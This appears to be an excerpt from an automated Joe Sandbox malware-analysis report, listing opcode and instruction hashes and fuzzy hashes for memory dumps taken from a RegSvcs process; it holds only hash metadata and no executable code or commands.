                                                                                                              • Opcode ID: 044ad5b1a0bb5b6a3409d33c9bcb9396646afbed8cac5d7a9aa870148998fc03
                                                                                                              • Instruction ID: e8d985714a8942c922c8246b987f7541a331f7068884c439e204edc4bd9ad084
                                                                                                              • Opcode Fuzzy Hash: 044ad5b1a0bb5b6a3409d33c9bcb9396646afbed8cac5d7a9aa870148998fc03
                                                                                                              • Instruction Fuzzy Hash: 2231C271B00206DFD720DFA8C9C0AAEBBFABB84304F008529D246DB655D734E941CBA0
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 8cd4161f5b4d08ac4698b36444b06603346f514182f58bb0feca1d395408faf4
                                                                                                              • Instruction ID: 70cfd37bdfcabfa8a573d477fd7fee16a44a9ce7245c822f990a49c7d53baa47
                                                                                                              • Opcode Fuzzy Hash: 8cd4161f5b4d08ac4698b36444b06603346f514182f58bb0feca1d395408faf4
                                                                                                              • Instruction Fuzzy Hash: 9B21F232E4065BAADB14ABB9C840BEFBBF5BF54740F0584369A15FF240E270C90087A0
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 3ab973030ae61fae93221a0e66ba99335b7732e33128477711f5c867aac80dc3
                                                                                                              • Instruction ID: 019b7044cf6f597bb313b184c5bd822e45d7ad90d58f1c890e16f88be260d47f
                                                                                                              • Opcode Fuzzy Hash: 3ab973030ae61fae93221a0e66ba99335b7732e33128477711f5c867aac80dc3
                                                                                                              • Instruction Fuzzy Hash: 9A3149B19402519BDB35AF58CC45B6D7BF4FF90304F4481A9D9859F382EA749981CB90
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                                                                                                              • Instruction ID: de9f490d128f5786fb6e4ebb5d244d9013a767ea527e7b445266f34cc5ea3445
                                                                                                              • Opcode Fuzzy Hash: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                                                                                                              • Instruction Fuzzy Hash: 8F21D836602653ABCB25AB958D00ABEBBB5EF90610F40841EFB958A791F734D950C760
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 354afac749a2bbf6f3e03869e56b636bb4f44528a6a0debd250dafc91a6c3722
                                                                                                              • Instruction ID: fe3a8bf4a3efd84b5eaffddbec6fc85d6e73d3d38830d6794b31254efbaaedea
                                                                                                              • Opcode Fuzzy Hash: 354afac749a2bbf6f3e03869e56b636bb4f44528a6a0debd250dafc91a6c3722
                                                                                                              • Instruction Fuzzy Hash: 6631D831A4012D9BDB31EB18CC42FEE77B9FB55740F0105A1E649BF1A0D6749E808FA0
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
                                                                                                              • Instruction ID: 66ab33c9670edfada6e926aa1718c6cbef5dfb5c4339c27f3bf465f0bfcddaec
                                                                                                              • Opcode Fuzzy Hash: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
                                                                                                              • Instruction Fuzzy Hash: DE217135A00649EFCB15CFA8C990E8EBBB5FF48B14F108069EE159F245D671EA458B90
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: bf4306732580cb600bca0ffed2973145c2a9b416f06f930ea5e457b843483b2c
                                                                                                              • Instruction ID: 13c57b55f67d29f0a53093da5c1b65e5c44caa1c67666599f7d4cf582b7fa368
                                                                                                              • Opcode Fuzzy Hash: bf4306732580cb600bca0ffed2973145c2a9b416f06f930ea5e457b843483b2c
                                                                                                              • Instruction Fuzzy Hash: 47219C726047469FCB22CE58C890F6BB7E4FB98B60F01492DF9559F641D730E9008BA2
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                                                                                                              • Instruction ID: 87c50d7f6a57eb73072e724c25bf787449f2e21865c87c76f29d221717bd108a
                                                                                                              • Opcode Fuzzy Hash: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                                                                                                              • Instruction Fuzzy Hash: 8E318931600605EFE721DBA8C885F6AB7F9FF85354F1049A9E556DB290E730EE01CB50
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 6cdbd16fa017ee8f227cd4c88be5e4bfcd698fd7beaf6dec66578f26382ced7e
                                                                                                              • Instruction ID: 5a6b835ab163ebab239fd1cc7e3fafa05edea6e321e7cbe34745ceca31b8f2cf
                                                                                                              • Opcode Fuzzy Hash: 6cdbd16fa017ee8f227cd4c88be5e4bfcd698fd7beaf6dec66578f26382ced7e
                                                                                                              • Instruction Fuzzy Hash: 3B31B175A20225DFCB19CF1CDC849AEB7B5FF84304B154959F8059B391EB32E941CB90
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 532ea10c2041305e152eaa4ec4a075fc586509167159ec92dbd7ec7168c59030
                                                                                                              • Instruction ID: 2adaf83f405273681ce465e72cee9511e8100c845d1716994c442b882f2901d0
                                                                                                              • Opcode Fuzzy Hash: 532ea10c2041305e152eaa4ec4a075fc586509167159ec92dbd7ec7168c59030
                                                                                                              • Instruction Fuzzy Hash: 10219F7190062AEBCF20DF59CC81ABEB7F8FF48740B544069F941AB254D778AD52CBA0
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 24115eb9b3646ed883283e14aa062764bc229fc0d017dd35135c7bddd950c7f7
                                                                                                              • Instruction ID: d7898c2948ecda0f022a93478653c16009bdb533968798bff0a03873dd6775a2
                                                                                                              • Opcode Fuzzy Hash: 24115eb9b3646ed883283e14aa062764bc229fc0d017dd35135c7bddd950c7f7
                                                                                                              • Instruction Fuzzy Hash: B721AB71600606AFDB15DBACCC40E6AB7A8FF98740F184069F904DB790E738ED40CBA8
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 61765cd93ec7c7de0957193f72756b97637fcf33c520530feae5f8987caf2c56
                                                                                                              • Instruction ID: 7f7490ab3871d4e96a414b02490c872cfa2e7fe13e0f9646b239648c33bd0cec
                                                                                                              • Opcode Fuzzy Hash: 61765cd93ec7c7de0957193f72756b97637fcf33c520530feae5f8987caf2c56
                                                                                                              • Instruction Fuzzy Hash: 7C21CF729042469BDB11EF59CC44B9BBBDCBF90244F0C8456B980CB265D730C985C6A2
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: ece723b84e773474e9b553a4366304decff0d2afac8c7319a6bee781f51f314c
                                                                                                              • Instruction ID: 62c692fd7fe2b5dd38381a9d7c6a7f9424f3619884be9736f88de0f1028cf029
                                                                                                              • Opcode Fuzzy Hash: ece723b84e773474e9b553a4366304decff0d2afac8c7319a6bee781f51f314c
                                                                                                              • Instruction Fuzzy Hash: 34212931644782DBE722576C8C44B6C7BD4BF41774F280368FA25DF6E2D768D8018262
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 9f7ed5e824366f0ba35174a8e95daf81f5a06480f940dbb3697c0570ce006708
                                                                                                              • Instruction ID: a49831a8d1085c2829e30a288e6280697b7746f30d199bb15d81aa747c9c2aa4
                                                                                                              • Opcode Fuzzy Hash: 9f7ed5e824366f0ba35174a8e95daf81f5a06480f940dbb3697c0570ce006708
                                                                                                              • Instruction Fuzzy Hash: 0721AC75250602AFC72ADF69CC00B56B7F5BF48B08F24846CA509CF761E371E842CB94
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 93169c2e54e6c1676c6e94e837fe98ac2feb3aec25cbb2b78cdc0466a03ad5ab
                                                                                                              • Instruction ID: ccc4751d469eb9f3328973d3046cc659313248b91cbd33b2e092bfff0c6c9658
                                                                                                              • Opcode Fuzzy Hash: 93169c2e54e6c1676c6e94e837fe98ac2feb3aec25cbb2b78cdc0466a03ad5ab
                                                                                                              • Instruction Fuzzy Hash: 3E1106723C0B12BFE72656A99C01F2B7699EBD4B60F110468F75ACF690EB60DC0187D5
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 0566c5ce1e0c839de28bed6d781f24d95101fbbab53b8f2d9e2a6d34123f5abb
                                                                                                              • Instruction ID: 8a711b82835785a07e3fa9326d7bd2cd4f2876440fb25744396bf4365aa41021
                                                                                                              • Opcode Fuzzy Hash: 0566c5ce1e0c839de28bed6d781f24d95101fbbab53b8f2d9e2a6d34123f5abb
                                                                                                              • Instruction Fuzzy Hash: B421E9B1E00359ABCB20DFAAD8919AEFBF9FF98610F10022EE505A7354D7709941CB54
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 5cbf44edbda76f4502fdddb46b30f07fa62677dc347fe83d1d029fa4afc5ea58
                                                                                                              • Instruction ID: 17cd3c0c25b4add35bb98c69e32fd9838bef8cc3ed440d2fddf62102093729ae
                                                                                                              • Opcode Fuzzy Hash: 5cbf44edbda76f4502fdddb46b30f07fa62677dc347fe83d1d029fa4afc5ea58
                                                                                                              • Instruction Fuzzy Hash: FA216772A0061AAFDB129F98CC44BAEBBFAFF98315F204859F940A7291D734D9518F50
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                                                                                                              • Instruction ID: a52da0de00a237fec570c8a361c0cfcf9d772a5a4def2b58937aab115106e541
                                                                                                              • Opcode Fuzzy Hash: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                                                                                                              • Instruction Fuzzy Hash: 62119D76601606EFE7229E99DC41FAABBB8FBD0B64F10442DF6049F190E671ED44CB60
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 79f7db2cd7048835c916828634870bfb69cf9e05f3d1e55f1aa11cce05d653d7
                                                                                                              • Instruction ID: 26653dea074a35aa9936b0afbb7312ab3fb00b0440567347c36d02360926026e
                                                                                                              • Opcode Fuzzy Hash: 79f7db2cd7048835c916828634870bfb69cf9e05f3d1e55f1aa11cce05d653d7
                                                                                                              • Instruction Fuzzy Hash: E611C1717006199BDF15CF4DC5C0A6EBBE9BF8B710B1980ADEE089F205D6B2D901C792
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              • Opcode Fuzzy Hash: 12780642ebc67bda82d6bd058f63524ff24ef2c809b2a7a6c2dcc31f8e588ab6
                                                                                                              • Instruction Fuzzy Hash: 05118B32241642EFDB26EF19DD90F56BBB8FF94B84F200465E9059F6A1C335ED01CA90
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: f4703d4c27f205f13c42fa8a6b9400a99adffb13358110fccba107571c3c52ff
                                                                                                              • Instruction ID: 3e0ce2132b0b441314d494eaa515cce3b17e2f48f1a5f11f8c53a54873b2afaa
                                                                                                              • Opcode Fuzzy Hash: f4703d4c27f205f13c42fa8a6b9400a99adffb13358110fccba107571c3c52ff
                                                                                                              • Instruction Fuzzy Hash: 79115A7054122AABEF75AB68CD52FEDB2B4BF44714F5041D4A318AA0E0DA709E85CF85
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 933c5c6f95d69a978c9778a93ae3739f3431b99b805229a3b32719e799e40ee8
                                                                                                              • Instruction ID: 126f12304e87d594da8e2985f474b2421af066d83c607673305fd8bab4a8e102
                                                                                                              • Opcode Fuzzy Hash: 933c5c6f95d69a978c9778a93ae3739f3431b99b805229a3b32719e799e40ee8
                                                                                                              • Instruction Fuzzy Hash: 4E11177790001AABCB21DB94CC80DEFBB7CFF48254F044166E906A7211EA34AA55CBA0
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                                                                                              • Instruction ID: 72025ccc691f7d8ea476506068ff067f2b97143a58f9cc6de9fa1d3f5a44a081
                                                                                                              • Opcode Fuzzy Hash: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                                                                                              • Instruction Fuzzy Hash: 86014733601211ABEF159E6DD884B9AB7ABBFC4700F5544AAED058F246EE71CC81C391
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: e64915023f175b700a07699a30e656f19f753d754559f137089220fc16a83155
                                                                                                              • Instruction ID: efd0229e3c0eb6e0e217b7c598d5b3f2962bf651f18c81ee8a863f61fcffd69d
                                                                                                              • Opcode Fuzzy Hash: e64915023f175b700a07699a30e656f19f753d754559f137089220fc16a83155
                                                                                                              • Instruction Fuzzy Hash: 4711A1326445569FD711CF68D800BA6BBB9FB9A314F08C159ED499F315D732EC81CBA0
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 8eaca2e02ae56c203fcf63ecdd7990fea84a90546734991a575933dac6f61921
                                                                                                              • Instruction ID: ab8f59d0478a38fb732fcadaf482233f096107b8021dcf6fcf9867b6b18e834c
                                                                                                              • Opcode Fuzzy Hash: 8eaca2e02ae56c203fcf63ecdd7990fea84a90546734991a575933dac6f61921
                                                                                                              • Instruction Fuzzy Hash: 0F111CB1A0020ADBCB00DF99D585A9EBBF4FF58250F14406AA905E7351D674EA018BA4
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 10dc9f3618d9f67c668996f05b37270e42ba80bcfd08c5bcbc7a61817c7eb4e3
                                                                                                              • Instruction ID: cbd58ce1859913511a51ca98b5a7b279321b30e7498ceb5a7f0fe6ff7ee2bfbb
                                                                                                              • Opcode Fuzzy Hash: 10dc9f3618d9f67c668996f05b37270e42ba80bcfd08c5bcbc7a61817c7eb4e3
                                                                                                              • Instruction Fuzzy Hash: B9017135580212ABC732AE19CC5097BBBB9FFD2650B45842AE945AF711DB22DC43CBA1
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                                                                                                              • Instruction ID: 8c878b7419840832ebbbfcd784b3c763320543ef879aba43c4fa0da816c5fecc
                                                                                                              • Opcode Fuzzy Hash: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                                                                                                              • Instruction Fuzzy Hash: A201B532500706DFEB26AAAAC844AABB7F9FFC5654F04481EA9469F540DE70E402CB60
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 89988964bc0b45ce7560111d819aac2cf4460dcf729f11cb26d55cdec001ec8b
                                                                                                              • Instruction ID: 37816373825f99689badd9dd585113fdf17ff4cdf775bbac5802cca35bc6565b
                                                                                                              • Opcode Fuzzy Hash: 89988964bc0b45ce7560111d819aac2cf4460dcf729f11cb26d55cdec001ec8b
                                                                                                              • Instruction Fuzzy Hash: 28112D75A0120DEBDB15DFA8CC51AAE7BB5FB84694F008099E9059B290D635AE11CB90
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 1223bf0b7514b4a468b24a5616c7e7b391f4e628b251cb49fee31c620ae50988
                                                                                                              • Instruction ID: 6d28502f2679fd6c62591fc5a90d87c1d8f1ab26f535678d45e01fa96907892e
                                                                                                              • Opcode Fuzzy Hash: 1223bf0b7514b4a468b24a5616c7e7b391f4e628b251cb49fee31c620ae50988
                                                                                                              • Instruction Fuzzy Hash: 1D0184B1691902BFD251BB69CD81E5BBBECFF99654B400629B1098BA51DB24EC01C6A0
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: cd914b862b439e2a0b53a6f83de2a9463265b24347ee47da38210cbcf3ef00a3
                                                                                                              • Instruction ID: 8819c2c18be742037dd3091dbd20382b5cd7009c05aba803b3a043032ab04d6b
                                                                                                              • Opcode Fuzzy Hash: cd914b862b439e2a0b53a6f83de2a9463265b24347ee47da38210cbcf3ef00a3
                                                                                                              • Instruction Fuzzy Hash: 2901FC32214616DBC320DF6ECC4896BFBA8FF94660F114229ED598B2D0E7309911CBD1
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 32ba0b1ac61344191282afbcfac9a7e4e08a9e9f379a5a10e50ce00d984bbe0a
                                                                                                              • Instruction ID: 004db199c1632c4f2e2d3b323b245ccf595c1580f9f9f45a60fe6867c682e182
                                                                                                              • Opcode Fuzzy Hash: 32ba0b1ac61344191282afbcfac9a7e4e08a9e9f379a5a10e50ce00d984bbe0a
                                                                                                              • Instruction Fuzzy Hash: BB115B75A41209EBDB15EFA8C844EAE7BB6FB98250F044059F90197354DA34E911CB90
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 30f2743ece997c2b23df6c2c605a2d397f2cfa02723b85d0c22e42bb98031d0b
                                                                                                              • Instruction ID: 7609dc94053ea57eef1e0da4320d136c7d2bccbf7bb5fb141e75a628469b28aa
                                                                                                              • Opcode Fuzzy Hash: 30f2743ece997c2b23df6c2c605a2d397f2cfa02723b85d0c22e42bb98031d0b
                                                                                                              • Instruction Fuzzy Hash: 941179B16083099FC710DF69C84195FBBE4FF98310F00891AB998DB3A0E630E900CB92
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 081bacc8bd33e49062efdee9b0cae9062743802a6481317aa141183ccbeed5c9
                                                                                                              • Instruction ID: 3252bc532f6a6d86ade8d1d3e23a14b6a829ba1b833499f0f6aceaa886fc9b1d
                                                                                                              • Opcode Fuzzy Hash: 081bacc8bd33e49062efdee9b0cae9062743802a6481317aa141183ccbeed5c9
                                                                                                              • Instruction Fuzzy Hash: 551179B26083099FC310DF6DC84194FBBE4FF99350F00851AB958DB3A4E630E900CB92
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                                                                                                              • Instruction ID: a3a7aa74c07b9d7af6f05b577064662136f123f6360b54473625999e5cbb022a
                                                                                                              • Opcode Fuzzy Hash: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
